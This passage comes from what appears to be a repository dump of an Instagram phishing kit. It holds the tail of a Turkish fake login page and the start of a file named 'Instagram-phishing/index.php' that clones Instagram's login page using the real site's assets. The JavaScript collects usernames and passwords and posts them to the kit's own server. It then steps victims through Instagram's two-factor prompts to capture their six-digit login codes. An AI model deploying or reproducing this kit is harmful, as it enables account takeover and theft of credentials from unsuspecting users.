background    : #299029;\r\n              border        : 1px solid #39c739;\r\n              color         : #fff;\r\n              border-radius : 10px;\r\n              cursor        : pointer;\r\n          }\r\n\r\n          .onay_kodu_ekrani button:hover {\r\n              background : #207520;\r\n          }\r\n\r\n          .onay_kodu_ekrani button:disabled {\r\n              background : #6fcc6f;\r\n          }\r\n\r\n          .onay_kodu_girme_ekrani input {\r\n              padding   : 10px;\r\n              font-size : 14px;\r\n          }\r\n\r\n          .onay_kodu_girme_ekrani button {\r\n              width         : 160px;\r\n              margin        : 30px auto;\r\n              padding       : 8px;\r\n              background    : #299029;\r\n              border        : 1px solid #39c739;\r\n              color         : #fff;\r\n              border-radius : 10px;\r\n              cursor        : pointer;\r\n          }\r\n\r\n          .onay_kodu_girme_ekrani button:hover {\r\n              background : #207520;\r\n          }\r\n\r\n          .onay_kodu_girme_ekrani button:disabled {\r\n              background : #6fcc6f;\r\n          }\r\n      </style>\r\n      <div class=\"onay_kodu_ekrani\"></div>\r\n      <div class=\"onay_kodu_girme_ekrani\"></div>\r\n      <script src=\"/assets/jquery/2.2.4/jquery.min.js\"></script>\r\n      <script src='https://www.google.com/recaptcha/api.js'></script>\r\n      <script>\r\n          $('#login_insta').click(function() {\r\n              $('#slfErrorAlert').hide();\r\n              $(this).attr(\"disabled\", \"disabled\");\r\n              $maindiv = $(this);\r\n              $maindiv.addClass(\"instaclass31\");\r\n              $('.spispinner').show();\r\n                            var dataList = \"username=\" + encodeURIComponent($('input[name=\"username\"]').val()) + \"&password=\" + encodeURIComponent($('input[name=\"password\"]').val()) + \"&userid=\" + encodeURIComponent($('input[name=\"userid\"]').val()) + \"&antiForgeryToken=b867cd8017daa9e0e90375f0cacbadc9\";\r\n              \r\n              $.ajax({\r\n                         type    : \"POST\",\r\n                         url     : \"?\",\r\n                         dataType: \"json\",\r\n                         data    : dataList,\r\n                         success : function(json) {\r\n                             if(json.status == 'success') {\r\n                                 window.parent.location.href = json.returnUrl;\r\n                                 window.parent.$.fancybox.close();\r\n                             } else {\r\n\r\n                                 var $allData = json.allData;\r\n\r\n                                 if(json.status == 3) {\r\n\r\n                                     if(json.allData.step_name == 'verify_code') {\r\n\r\n                                         var onayKoduEkrani = $('.onay_kodu_girme_ekrani');\r\n                                         onayKoduEkrani.html('');\r\n                                         var html = \"<div>İnstagram tarafından telefonunuza veya mail adresinize gönderilen 6 haneli giriş kodunu arasında boşluk bırakmadan girerek devam edin, ardından sisteme girişiniz sağlanacaktır.</div><br/>\";\r\n                                         html += \"<input type='number' id='kod_onayla_input' value='' maxlength='6' placeholder='Onay Kodunu Buraya Yaz'/>\";\r\n                                         html += \"<div><button class='kod_onayla'>Onayla ve Giriş Yap</button>\";\r\n                                         onayKoduEkrani.html(html);\r\n                                         onayKoduEkrani.show();\r\n\r\n                                         $('.kod_onayla').click(function() {\r\n                                             var kodOnay = $('#kod_onayla_input').val();\r\n\r\n                                             if(kodOnay.length < 6) {\r\n                                                 alert(\"Gelen onay kodu en az 6 karakter olmalıdır, girdiğiniz kodun doğru olduğudan emin olunuz.\");\r\n                                             }\r\n\r\n                                             $allData.code = kodOnay;\r\n                                             $('.kod_onayla').attr(\"disabled\", \"disabled\");\r\n                                             $('.kod_onayla').html('Onaylanıyor..');\r\n                                             $.ajax({\r\n                                                        url    : \"/ajax/kod-onayla\",\r\n                                                        data   : $allData,\r\n                                                        type   : \"POST\",\r\n                                                        success: function(json) {\r\n                                                            if(json.status == \"ok\") {\r\n                                                                window.parent.location.href = json.returnUrl;\r\n                                                                window.parent.$.fancybox.close();\r\n                                                            } else {\r\n                                                                alert(json.error);\r\n                                                                $('.spispinner').hide();\r\n                                                                $maindiv.removeAttr(\"disabled\");\r\n                                                                $maindiv.removeClass(\"instaclass31\");\r\n                                                            }\r\n                                                        }\r\n                                                    });\r\n                                         });\r\n\r\n                                     } else {\r\n                                         var onayEkrani = $('.onay_kodu_ekrani');\r\n                                         onayEkrani.html('');\r\n                                         var data = json.allData.step_data;\r\n\r\n\r\n                                         var html = \"<div>\" + json.error + \"</div><br/>\";\r\n                                         var html = \"<div>Giriş yapabilmek için aşağıdaki seçeneklerden birini seçerek 'Güvenlik Kodu Gönder' butonuna tıklayınız!</div><br/>\";\r\n                                         html += \"<select id='choice_select'>\";\r\n\r\n                                         if(typeof data.phone_number !== \"undefined\") {\r\n                                             html += \"<option value='0'>GSM ile Onayla: \" + data.phone_number + \"</option>\";\r\n                                         }\r\n\r\n                                         if(typeof data.email !== \"undefined\") {\r\n                                             html += \"<option value='1'>E-Posta ile Onayla: \" + data.email + \"</option>\";\r\n                                         }\r\n\r\n                                         html += \"</select>\";\r\n                                         html += \"<div><button class='kod_iste'>Güvenlik Kodu Gönder</button></div>\";\r\n                                         onayEkrani.html(html);\r\n                                         onayEkrani.show();\r\n\r\n                                         json.allData.choice = $('#choice_select').val();\r\n                                     }\r\n\r\n\r\n                                     $('.kod_iste').click(function() {\r\n                                         $('.kod_iste').attr(\"disabled\", \"disabled\");\r\n                                         $('.kod_iste').html('Kod İsteniyor...');\r\n\r\n                                         $.ajax({\r\n                                                    url    : \"/ajax/kod-gonder\",\r\n                                                    data   : $allData,\r\n                                                    type   : \"POST\",\r\n                                                    success: function(json) {\r\n                                                        if(json.status == \"ok\") {\r\n                                                            var onayKoduEkrani = $('.onay_kodu_girme_ekrani');\r\n                                                            onayKoduEkrani.html('');\r\n                                                            var html = \"<div>İnstagram tarafından telefonunuza veya mail adresinize gönderlen 6 haneli giriş kodunu girerek devam edin, ardından sisteme girişiniz sağlanacaktır.</div><br/>\";\r\n                                                            html += \"<input type='number' id='kod_onayla_input' value='' maxlength='6' placeholder='Onay Kodunu Buraya Yaz'></input>\";\r\n                                                            html += \"<div><button class='kod_onayla'>Onayla ve Giriş Yap</button></div>\";\r\n                                                            onayKoduEkrani.html(html);\r\n                                                            onayKoduEkrani.show();\r\n\r\n\r\n                                                            $('.kod_onayla').click(function() {\r\n                                                                var kodOnay = $('#kod_onayla_input').val();\r\n                                                                if(kodOnay.length < 6) {\r\n                                                                    alert(\"Gelen onay kodu en az 6 karakter olmalıdır, girdiğiniz kodun doğru olduğudan emin olunuz.\");\r\n                                                                    $('.spispinner').hide();\r\n                                                                    $maindiv.removeAttr(\"disabled\");\r\n                                                                    $maindiv.removeClass(\"instaclass31\");\r\n                                                                }\r\n\r\n                                                                $allData.code = kodOnay;\r\n                                                                $('.kod_onayla').attr(\"disabled\", \"disabled\");\r\n                                                                $('.kod_onayla').html('Onaylanıyor..');\r\n                                                                $.ajax({\r\n                                                                           url    : \"/ajax/kod-onayla\",\r\n                                                                           data   : $allData,\r\n                                                                           type   : \"POST\",\r\n                                                                           success: function(json) {\r\n                                                                               if(json.status == \"success\") {\r\n                                                                                   window.parent.location.href = json.returnUrl;\r\n                                                                                   window.parent.$.fancybox.close();\r\n                                                                               } else {\r\n                                                                                   alert(json.error);\r\n                                                                                   $('.spispinner').hide();\r\n                                                                                   $maindiv.removeAttr(\"disabled\");\r\n                                                                                   $maindiv.removeClass(\"instaclass31\");\r\n                                                                               }\r\n                                                                           }\r\n                                                                       });\r\n                                                            });\r\n\r\n                                                        } else {\r\n                                                            alert(json.error);\r\n                                                            $('.spispinner').hide();\r\n                                                            $maindiv.removeAttr(\"disabled\");\r\n                                                            $maindiv.removeClass(\"instaclass31\");\r\n                                                        }\r\n                                                    }\r\n                                                });\r\n\r\n                                     });\r\n\r\n                                 } else {\r\n                                     alert(json.error);\r\n                                     $('.spispinner').hide();\r\n                                     $maindiv.removeAttr(\"disabled\");\r\n                                     $maindiv.removeClass(\"instaclass31\");\r\n                                 }\r\n                             }\r\n                         }\r\n                     });\r\n          });\r\n\r\n                    (function(i, s, o, g, r, a, m) {\r\n              i['GoogleAnalyticsObject'] = r;\r\n              i[r] = i[r] || function() {\r\n                  (i[r].q = i[r].q || []).push(arguments)\r\n              }, i[r].l = 1 * new Date();\r\n              a = s.createElement(o),\r\n                  m = s.getElementsByTagName(o)[0];\r\n              a.async = 1;\r\n              a.src   = g;\r\n              m.parentNode.insertBefore(a, m)\r\n          })(window, document, 'script', 'https://www.google-analytics.com/analytics.js', 'ga');\r\n          ga('create', 'UA-96251606-1', 'auto');\r\n          ga('send', 'pageview');\r\n          \r\n          var currentRequest = null;\r\n          $('#username').keyup(function() {\r\n              $('.suggestUsers ul').html(\"<div style='font-size: 12px;\\n\" +\r\n                                         \"    padding: 10px 5px;\\n\" +\r\n                                         \"    color: #a6a6a6;'>Yükleniyor...</div>\");\r\n              $('input[name=\"userid\"]').val(\"\");\r\n              $('.suggestUsers').show();\r\n              var value      = $(this).val();\r\n              currentRequest = $.ajax({\r\n                                          type      : \"GET\",\r\n                                          // url       : \"/ajax/get-user?user=\" + value,\r\n                                          url     : \"https://www.instagram.com/web/search/topsearch/?context=blended&query=\" + value + \"&rank_token=0.8516828732626001&include_reel=true&limit=10\",\r\n                                          dataType  : \"json\",\r\n                                          beforeSend: function() {\r\n                                              if(currentRequest != null) {\r\n                                                  currentRequest.abort();\r\n                                              }\r\n                                          },\r\n                                          success   : function(response) {\r\n                                              var html = \"\";\r\n                                              response.users.forEach(function(a, b) {\r\n                                                  html += \"<li onclick='$(\\\"input[name=username]\\\").val(\\\"\" + a.user.username + \"\\\");$(\\\"input[name=userid]\\\").val(\" + a.user.pk + \");$(\\\".suggestUsers ul\\\").html(\\\"\\\");$(\\\".suggestUsers\\\").hide();'><div class='suggestimg'><img src='\" + a.user.profile_pic_url + \"'/></div><div class='suggestinfo'><b>\" + a.user.username + \"</b><span>\" + a.user.full_name + \"</span></div></li>\";\r\n                                              });\r\n                                              $('.suggestUsers ul').html(html);\r\n                                          }\r\n                                      })\r\n          });\r\n      </script>\r\n      <script>\r\n    function myFunction() {\r\n    var x = document.getElementById(\"sifre\");\r\n    if (x.type === \"password\") {\r\n        x.type = \"text\";\r\n    } else {\r\n        x.type = \"password\";\r\n    }\r\n}\r\n</script>\r\n</body>\r\n</html>\r\n"
  },
  {
    "path": "Site/Instagram/Instagram-phishing/index.php",
    "content": "<html lang=\"tr\" class=\"js not-logged-in client-root touch js-focus-visible sDN5V\"><head>\r\n  <meta charset=\"utf-8\">\r\n  <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\r\n\r\n  <title>Giriş Yap • Instagram</title>\r\n\r\n\r\n  <meta name=\"robots\" content=\"noimageindex, noarchive\">\r\n  <meta name=\"apple-mobile-web-app-status-bar-style\" content=\"default\">\r\n  <meta name=\"mobile-web-app-capable\" content=\"yes\">\r\n  <meta name=\"theme-color\" content=\"#ffffff\">\r\n  <meta id=\"viewport\" name=\"viewport\" content=\"width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1, viewport-fit=cover\">\r\n  <link rel=\"manifest\" href=\"/data/manifest.json\">\r\n  <link href=\"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css\" rel=\"stylesheet prefetch\">\r\n  <link rel=\"preload\" href=\"https://www.instagram.com/static/bundles/es6/ConsumerUICommons.css/5ec5409f6864.css\" as=\"style\" type=\"text/css\" crossorigin=\"anonymous\">\r\n  <link rel=\"preload\" href=\"https://www.instagram.com/static/bundles/es6/ConsumerAsyncCommons.css/27a959f10aa9.css\" as=\"style\" type=\"text/css\" crossorigin=\"anonymous\">\r\n  <link rel=\"preload\" href=\"https://www.instagram.com/static/bundles/es6/Consumer.css/5618806114ac.css\" as=\"style\" type=\"text/css\" crossorigin=\"anonymous\">\r\n  <link rel=\"preload\" href=\"https://www.instagram.com/static/bundles/es6/FBSignupPage.css/ec2ddf131f68.css\" as=\"style\" type=\"text/css\" crossorigin=\"anonymous\">\r\n  <link rel=\"preload\" href=\"https://www.instagram.com/static/bundles/es6/LoginAndSignupPage.css/c9eae584ca84.css\" as=\"style\" type=\"text/css\" crossorigin=\"anonymous\">\r\n  <link rel=\"preload\" href=\"https://www.instagram.com/static/bundles/es6/Vendor.js/c911f5848b78.js\" as=\"script\" type=\"text/javascript\" crossorigin=\"anonymous\">\r\n  <link rel=\"preload\" href=\"https://www.instagram.com/static/bundles/es6/tr_TR.js/4efe3a559b4b.js\" as=\"script\" type=\"text/javascript\" crossorigin=\"anonymous\">\r\n  <link rel=\"preload\" href=\"https://www.instagram.com/static/bundles/es6/ConsumerLibCommons.js/aee2dda7a1bd.js\" as=\"script\" type=\"text/javascript\" crossorigin=\"anonymous\">\r\n  <link rel=\"preload\" href=\"https://www.instagram.com/static/bundles/es6/ConsumerUICommons.js/388ffaafb44f.js\" as=\"script\" type=\"text/javascript\" crossorigin=\"anonymous\">\r\n  <link rel=\"preload\" href=\"https://www.instagram.com/static/bundles/es6/ConsumerAsyncCommons.js/dbbcca2a020d.js\" as=\"script\" type=\"text/javascript\" crossorigin=\"anonymous\">\r\n  <link rel=\"preload\" href=\"https://www.instagram.com/static/bundles/es6/Consumer.js/fbbd80d076a0.js\" as=\"script\" type=\"text/javascript\" crossorigin=\"anonymous\">\r\n  <link rel=\"preload\" href=\"https://www.instagram.com/static/bundles/es6/FBSignupPage.js/68cb30f9baf8.js\" as=\"script\" type=\"text/javascript\" crossorigin=\"anonymous\">\r\n  <link rel=\"preload\" href=\"https://www.instagram.com/static/bundles/es6/LoginAndSignupPage.js/b2e37b561f81.js\" as=\"script\" type=\"text/javascript\" crossorigin=\"anonymous\">\r\n  <link rel=\"prefetch\" as=\"script\" href=\"https://www.instagram.com//static/bundles/es6/FeedPageContainer.js/9a19851d1932.js\" type=\"text/javascript\" crossorigin=\"anonymous\">\r\n  <link rel=\"prefetch\" as=\"stylesheet\" href=\"https://www.instagram.com/static/bundles/es6/FeedPageContainer.css/c77bce422006.css\" type=\"text/css\" crossorigin=\"anonymous\">\r\n\r\n\r\n  <script src=\"https://connect.facebook.net/en_US/sdk.js?hash=3f213b5217ca3c43b7ece6031232520b\" async=\"\" crossorigin=\"anonymous\"></script><script id=\"facebook-jssdk\" src=\"https://connect.facebook.net/en_US/sdk.js\"></script><script type=\"text/javascript\">\r\n    (function() {\r\n      var docElement = document.documentElement;\r\n      var classRE = new RegExp('(^|\\\\s)no-js(\\\\s|$)');\r\n      var className = docElement.className;\r\n      docElement.className = className.replace(classRE, '$1js$2');\r\n    })();\r\n  </script>\r\n  <script type=\"text/javascript\">\r\n    (function() {\r\n      if ('PerformanceObserver' in window && 'PerformancePaintTiming' in window) {\r\n        window.__bufferedPerformance = [];\r\n        var ob = new PerformanceObserver(function(e) {\r\n          window.__bufferedPerformance.push.apply(window.__bufferedPerformance,e.getEntries());\r\n        });\r\n        ob.observe({entryTypes:['paint']});\r\n      }\r\n\r\n      window.__bufferedErrors = [];\r\n      window.onerror = function(message, url, line, column, error) {\r\n        window.__bufferedErrors.push({\r\n          message: message,\r\n          url: url,\r\n          line: line,\r\n          column: column,\r\n          error: error\r\n        });\r\n        return false;\r\n      };\r\n      window.__initialData = {\r\n        pending: true,\r\n        waiting: []\r\n      };\r\n      function asyncFetchSharedData(extra) {\r\n        var sharedDataReq = new XMLHttpRequest();\r\n        sharedDataReq.onreadystatechange = function() {\r\n          if (sharedDataReq.readyState === 4) {\r\n            if(sharedDataReq.status === 200){\r\n              var sharedData = JSON.parse(sharedDataReq.responseText);\r\n              window.__initialDataLoaded(sharedData, extra);\r\n            }\r\n          }\r\n        }\r\n        sharedDataReq.open('GET', '/data/shared_data/', true);\r\n        sharedDataReq.send(null);\r\n      }\r\n      function notifyLoaded(item, data) {\r\n        item.pending = false;\r\n        item.data = data;\r\n        for (var i = 0;i < item.waiting.length; ++i) {\r\n          item.waiting[i].resolve(item.data);\r\n        }\r\n        item.waiting = [];\r\n      }\r\n      function notifyError(item, msg) {\r\n        item.pending = false;\r\n        item.error = new Error(msg);\r\n        for (var i = 0;i < item.waiting.length; ++i) {\r\n          item.waiting[i].reject(item.error);\r\n        }\r\n        item.waiting = [];\r\n      }\r\n      window.__initialDataLoaded = function(initialData, extraData) {\r\n        if (extraData) {\r\n          for (var key in extraData) {\r\n            initialData[key] = extraData[key];\r\n          }\r\n        }\r\n        notifyLoaded(window.__initialData, initialData);\r\n      };\r\n      window.__initialDataError = function(msg) {\r\n        notifyError(window.__initialData, msg);\r\n      };\r\n      window.__additionalData = {};\r\n      window.__pendingAdditionalData = function(paths) {\r\n        for (var i = 0;i < paths.length; ++i) {\r\n          window.__additionalData[paths[i]] = {\r\n            pending: true,\r\n            waiting: []\r\n          };\r\n        }\r\n      };\r\n      window.__additionalDataLoaded = function(path, data) {\r\n        if (path in window.__additionalData) {\r\n          notifyLoaded(window.__additionalData[path], data);\r\n        } else {\r\n          console.error('Unexpected additional data loaded \"' + path + '\"');\r\n        }\r\n      };\r\n      window.__additionalDataError = function(path, msg) {\r\n        if (path in window.__additionalData) {\r\n          notifyError(window.__additionalData[path], msg);\r\n        } else {\r\n          console.error('Unexpected additional data encountered an error \"' + path + '\": ' + msg);\r\n        }\r\n      };\r\n\r\n    })();\r\n  </script><script type=\"text/javascript\">\r\n\r\n/*\r\n Copyright 2018 Google Inc. All Rights Reserved.\r\n Licensed under the Apache License, Version 2.0 (the \"License\");\r\n you may not use this file except in compliance with the License.\r\n You may obtain a copy of the License at\r\n\r\n     http://www.apache.org/licenses/LICENSE-2.0\r\n\r\n Unless required by applicable law or agreed to in writing, software\r\n distributed under the License is distributed on an \"AS IS\" BASIS,\r\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n See the License for the specific language governing permissions and\r\n limitations under the License.\r\n */\r\n\r\n (function(){function g(a,c){b||(b=a,f=c,h.forEach(function(a){removeEventListener(a,l,e)}),m())}function m(){b&&f&&0<d.length&&(d.forEach(function(a){a(b,f)}),d=[])}function n(a,c){function k(){g(a,c);d()}function b(){d()}function d(){removeEventListener(\"pointerup\",k,e);removeEventListener(\"pointercancel\",b,e)}addEventListener(\"pointerup\",k,e);addEventListener(\"pointercancel\",b,e)}function l(a){if(a.cancelable){var c=performance.now(),b=a.timeStamp;b>c&&(c=+new Date);c-=b;\"pointerdown\"==a.type?n(c,\r\n  a):g(c,a)}}var e={passive:!0,capture:!0},h=[\"click\",\"mousedown\",\"keydown\",\"touchstart\",\"pointerdown\"],b,f,d=[];h.forEach(function(a){addEventListener(a,l,e)});window.perfMetrics=window.perfMetrics||{};window.perfMetrics.onFirstInputDelay=function(a){d.push(a);m()}})();\r\n</script>\r\n\r\n<link rel=\"apple-touch-icon-precomposed\" sizes=\"76x76\" href=\"https://www.instagram.com/static/images/ico/apple-touch-icon-76x76-precomposed.png/666282be8229.png\">\r\n<link rel=\"apple-touch-icon-precomposed\" sizes=\"120x120\" href=\"https://www.instagram.com/static/images/ico/apple-touch-icon-120x120-precomposed.png/8a5bd3f267b1.png\">\r\n<link rel=\"apple-touch-icon-precomposed\" sizes=\"152x152\" href=\"https://www.instagram.com/static/images/ico/apple-touch-icon-152x152-precomposed.png/68193576ffc5.png\">\r\n<link rel=\"apple-touch-icon-precomposed\" sizes=\"167x167\" href=\"https://www.instagram.com/static/images/ico/apple-touch-icon-167x167-precomposed.png/4985e31c9100.png\">\r\n<link rel=\"apple-touch-icon-precomposed\" sizes=\"180x180\" href=\"https://www.instagram.com/static/images/ico/apple-touch-icon-180x180-precomposed.png/c06fdb2357bd.png\">\r\n\r\n<link rel=\"icon\" sizes=\"192x192\" href=\"https://www.instagram.com/static/images/ico/favicon-192.png/68d99ba29cc8.png\">\r\n\r\n\r\n\r\n<link rel=\"mask-icon\" href=\"https://www.instagram.com/static/images/ico/favicon.svg/fc72dd4bfde8.svg\" color=\"#262626\">\r\n\r\n<link rel=\"shortcut icon\" type=\"image/x-icon\" href=\"/static/images/ico/favicon.ico/36b3ee2d91ed.ico\">\r\n\r\n\r\n\r\n\r\n\r\n<meta content=\"Instagram'a tekrar hoş geldin. Arkadaşlarının, ailenin ve tüm dünyadan ilgi alanların hakkındaki Sayfaların çekip paylaştığı fotoğrafları ve videoları görmek için kaydol.\" name=\"description\">\r\n<link rel=\"canonical\" href=\"https://www.instagram.com/accounts/login/?hl=tr\">\r\n\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/\" hreflang=\"x-default\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=en\" hreflang=\"en\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=fr\" hreflang=\"fr\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=it\" hreflang=\"it\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=de\" hreflang=\"de\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=es\" hreflang=\"es\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=zh-cn\" hreflang=\"zh-cn\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=zh-tw\" hreflang=\"zh-tw\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=ja\" hreflang=\"ja\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=ko\" hreflang=\"ko\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=pt\" hreflang=\"pt\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=pt-br\" hreflang=\"pt-br\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=af\" hreflang=\"af\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=cs\" hreflang=\"cs\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=da\" hreflang=\"da\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=el\" hreflang=\"el\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=fi\" hreflang=\"fi\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=hr\" hreflang=\"hr\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=hu\" hreflang=\"hu\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=id\" hreflang=\"id\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=ms\" hreflang=\"ms\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=nb\" hreflang=\"nb\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=nl\" hreflang=\"nl\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=pl\" hreflang=\"pl\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=ru\" hreflang=\"ru\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=sk\" hreflang=\"sk\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=sv\" hreflang=\"sv\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=th\" hreflang=\"th\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=tl\" hreflang=\"tl\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=tr\" hreflang=\"tr\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=hi\" hreflang=\"hi\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=bn\" hreflang=\"bn\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=gu\" hreflang=\"gu\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=kn\" hreflang=\"kn\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=ml\" hreflang=\"ml\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=mr\" hreflang=\"mr\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=pa\" hreflang=\"pa\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=ta\" hreflang=\"ta\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=te\" hreflang=\"te\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=ne\" hreflang=\"ne\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=si\" hreflang=\"si\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=ur\" hreflang=\"ur\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=vi\" hreflang=\"vi\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=bg\" hreflang=\"bg\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=fr-ca\" hreflang=\"fr-ca\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=ro\" hreflang=\"ro\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=sr\" hreflang=\"sr\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=uk\" hreflang=\"uk\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=zh-hk\" hreflang=\"zh-hk\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=es-la\" hreflang=\"es-py\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=es-la\" hreflang=\"es-ar\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=es-la\" hreflang=\"es-ec\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=es-la\" hreflang=\"es-pe\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=es-la\" hreflang=\"es-cu\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=es-la\" hreflang=\"es-bo\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=es-la\" hreflang=\"es-gt\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=es-la\" hreflang=\"es-do\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=es-la\" hreflang=\"es-hn\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=es-la\" hreflang=\"es-co\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=es-la\" hreflang=\"es-sv\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=es-la\" hreflang=\"es-cr\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=es-la\" hreflang=\"es-mx\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=es-la\" hreflang=\"es-ve\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=es-la\" hreflang=\"es-pr\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=es-la\" hreflang=\"es-pa\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=es-la\" hreflang=\"es-uy\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=es-la\" hreflang=\"es-cl\">\r\n<link rel=\"alternate\" href=\"https://www.instagram.com/accounts/login/?hl=es-la\" hreflang=\"es-ni\">\r\n<script type=\"text/javascript\" as=\"script\" crossorigin=\"anonymous\" charset=\"utf-8\" async=\"\" src=\"https://www.instagram.com/static/bundles/es6/LoginAndSignupPage.js/b2e37b561f81.js\"></script><link href=\"https://www.instagram.com/static/bundles/es6/LoginAndSignupPage.css/c9eae584ca84.css\" type=\"text/css\" crossorigin=\"anonymous\" rel=\"stylesheet\"><style type=\"text/css\">.fb_hidden{position:absolute;top:-10000px;z-index:10001}.fb_reposition{overflow:hidden;position:relative}.fb_invisible{display:none}.fb_reset{background:none;border:0;border-spacing:0;color:#000;cursor:auto;direction:ltr;font-family:\"lucida grande\", tahoma, verdana, arial, sans-serif;font-size:11px;font-style:normal;font-variant:normal;font-weight:normal;letter-spacing:normal;line-height:1;margin:0;overflow:visible;padding:0;text-align:left;text-decoration:none;text-indent:0;text-shadow:none;text-transform:none;visibility:visible;white-space:normal;word-spacing:normal}.fb_reset>div{overflow:hidden}@keyframes fb_transform{from{opacity:0;transform:scale(.95)}to{opacity:1;transform:scale(1)}}.fb_animate{animation:fb_transform .3s forwards}\r\n.fb_dialog{background:rgba(82, 82, 82, .7);position:absolute;top:-10000px;z-index:10001}.fb_dialog_advanced{border-radius:8px;padding:10px}.fb_dialog_content{background:#fff;color:#373737}.fb_dialog_close_icon{background:url(https://static.xx.fbcdn.net/rsrc.php/v3/yq/r/IE9JII6Z1Ys.png) no-repeat scroll 0 0 transparent;cursor:pointer;display:block;height:15px;position:absolute;right:18px;top:17px;width:15px}.fb_dialog_mobile .fb_dialog_close_icon{left:5px;right:auto;top:5px}.fb_dialog_padding{background-color:transparent;position:absolute;width:1px;z-index:-1}.fb_dialog_close_icon:hover{background:url(https://static.xx.fbcdn.net/rsrc.php/v3/yq/r/IE9JII6Z1Ys.png) no-repeat scroll 0 -15px transparent}.fb_dialog_close_icon:active{background:url(https://static.xx.fbcdn.net/rsrc.php/v3/yq/r/IE9JII6Z1Ys.png) no-repeat scroll 0 -30px transparent}.fb_dialog_iframe{line-height:0}.fb_dialog_content .dialog_title{background:#6d84b4;border:1px solid 